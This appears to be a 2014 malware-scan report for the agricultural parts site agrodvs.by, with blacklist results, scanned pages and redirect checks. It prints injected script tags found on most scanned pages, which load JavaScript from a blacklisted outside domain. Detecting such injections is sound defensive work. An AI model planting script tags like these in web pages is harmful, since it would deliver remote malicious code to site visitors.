Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=agrodvs.by
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://agrodvs.by/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://agrodvs.by/ | 200 OK Content-Length: 14911 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: kunstmarkt-hessen.de <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>ÐÑодажа ÑелÑÑ Ð¾Ð·ÑÐµÑ Ð½Ð¸ÐºÐ¸ и запÑаÑÑей ÐÐÐ "ÐгÑо-ÐÐС"</title> <meta name="keywords" content="пÑодажа ÑелÑÑ Ð¾Ð·ÑÐµÑ Ð½Ð¸ÐºÐ¸ и запÑаÑÑей"> <meta name="description" content="пÑодажа ÑелÑÑ Ð¾Ð·ÑÐµÑ Ð½Ð¸ÐºÐ¸ и запÑаÑÑей"> <meta ...[4107 bytes skipped]... | ||
http://agrodvs.by/swfobject.js | 200 OK Content-Length: 25560 Content-Type: application/x-javascript | clean |
http://agrodvs.by/kardannye_valy.php | 200 OK Content-Length: 35486 Content-Type: text/html | clean |
http://agrodvs.by/sharniry.html | 200 OK Content-Length: 28060 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://kunstmarkt-hessen.de/hx3t2wmf.php?id=15221980"></script> | ||
http://agrodvs.by/kardannye_valy.html | 200 OK Content-Length: 35310 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://kunstmarkt-hessen.de/hx3t2wmf.php?id=15221913"></script> | ||
http://agrodvs.by/mufty_predohranitelnye.html | 200 OK Content-Length: 29203 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://kunstmarkt-hessen.de/hx3t2wmf.php?id=15221918"></script> | ||
http://agrodvs.by/perehodniki.html | 200 OK Content-Length: 18407 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://kunstmarkt-hessen.de/hx3t2wmf.php?id=15221923"></script> | ||
http://agrodvs.by/krestoviny.html | 200 OK Content-Length: 17191 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://kunstmarkt-hessen.de/hx3t2wmf.php?id=15221916"></script> | ||
http://agrodvs.by/selhoztehnika.html | 200 OK Content-Length: 15759 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://kunstmarkt-hessen.de/hx3t2wmf.php?id=15221933"></script> | ||
http://agrodvs.by/zapchasti.html | 200 OK Content-Length: 13412 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://kunstmarkt-hessen.de/hx3t2wmf.php?id=15221986"></script> | ||
http://agrodvs.by/zapchasti_1.html | 200 OK Content-Length: 17345 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://kunstmarkt-hessen.de/hx3t2wmf.php?id=15221988"></script> | ||
http://agrodvs.by/zapchasti_1_1.html | 200 OK Content-Length: 20650 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://kunstmarkt-hessen.de/hx3t2wmf.php?id=15221990"></script> | ||
http://agrodvs.by/zapchasti_1_2.html | 200 OK Content-Length: 20402 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://kunstmarkt-hessen.de/hx3t2wmf.php?id=15222011"></script> | ||
http://agrodvs.by/zapchasti_1_3.html | 200 OK Content-Length: 20992 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://kunstmarkt-hessen.de/hx3t2wmf.php?id=15222017"></script> | ||
http://agrodvs.by/zapchasti_1_4.html | 200 OK Content-Length: 18965 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://kunstmarkt-hessen.de/hx3t2wmf.php?id=15222019"></script> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: agrodvs.by
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sun, 07 Sep 2014 22:35:25 GMT
Pragma: no-cache
Server: nginx/1.4.4
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=7bbeb15803c45859de38cfde2b30c82a; path=/
X-Powered-By: PHP/5.2.17
GET / HTTP/1.1
Host: agrodvs.by
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sun, 07 Sep 2014 22:35:25 GMT
Pragma: no-cache
Server: nginx/1.4.4
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=7bbeb15803c45859de38cfde2b30c82a; path=/
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: agrodvs.by
Referer: http://www.google.com/search?q=agrodvs.by
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: agrodvs.by
Referer: http://www.google.com/search?q=agrodvs.by
Result:
The result is similar to the first query. There are no suspicious redirects found.